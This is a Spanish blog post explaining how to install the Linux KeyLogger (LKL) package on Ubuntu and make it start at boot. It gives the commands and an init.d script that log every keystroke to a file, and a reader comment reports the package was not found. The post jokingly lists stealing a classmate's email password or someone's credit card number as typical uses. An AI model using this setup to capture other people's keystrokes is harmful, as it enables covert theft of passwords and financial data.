Linux KeyLogger

keyloggerLinux KeyLogger o LKL es una herramienta que registra en un archivo todas las teclas que se han pulsado en una máquina. Generalmente, suele utilizarse con fines poco saludables, como por ejemplo, obtener el password de acceso al correo de la chica que te gusta de la uni, obtener el número de tarjeta de crédito de una persona X… así podemos seguir un buen rato maquinando cosas poco recomendables, sin embargo, su uso oficial es como herramienta de diagnóstico utilizada en el desarrollo de software.

Aquí os dejo como instalarlo en Ubuntu y hacer que se inicie automáticamente al encender la computadora:

sudo apt-get install lkl

Para lanzar el programa, ejecutamos:

sudo lkl -l -k /usr/share/lkl/keymaps/us_km -o log.txt &

A partir de este momento, estará almacenando en log.txt todos los eventos de teclado. Como vemos, utilizamos un keymap us_km, hay varios disponibles, sin embargo, tras hacer una búsqueda rápida, no he encontrado ninguno para el teclado español, por tanto teclas como la ‘ñ’ no las almacenará correctamente.

Para hacer que se arranque LKL automáticamente al iniciar nuestra máquina, nos curraremos el daemon correspondiente. Creamos un archivo llamado lkl en /etc/init.d, lo editamos e insertaremos la siguiente información:

#! /bin/sh
# /etc/init.d/lkl
#
# Carry out specific functions when asked to by the system
case "$1" in
start)
/usr/bin/lkl -l -k /usr/share/lkl/keymaps/us_km -o /usr/share/lkl/log.txt &
;;
stop)
killall lkl
;;
*)
echo "Usage: /etc/init.d/lkl {start|stop}"
exit 1
;;
esac

exit 0

Una vez hecho esto, le damos permisos de ejecución:
sudo chmod 755 /etc/init.d/lkl

Y por último, creamos los enlaces simbólicos con update-rc.d:
sudo update-rc.d lkl defaults

4 thoughts on “Linux KeyLogger

  1. hola, no me funciono, mira tengo ubunto 10.04 al escribir la primera linea que pusiste me aparece esto:

    Leyendo lista de paquetes… Hecho
    Creando árbol de dependencias
    Leyendo la información de estado… Hecho
    E: No se pudo encontrar el paquete lkl

    que puedo hacer?

Comments are closed.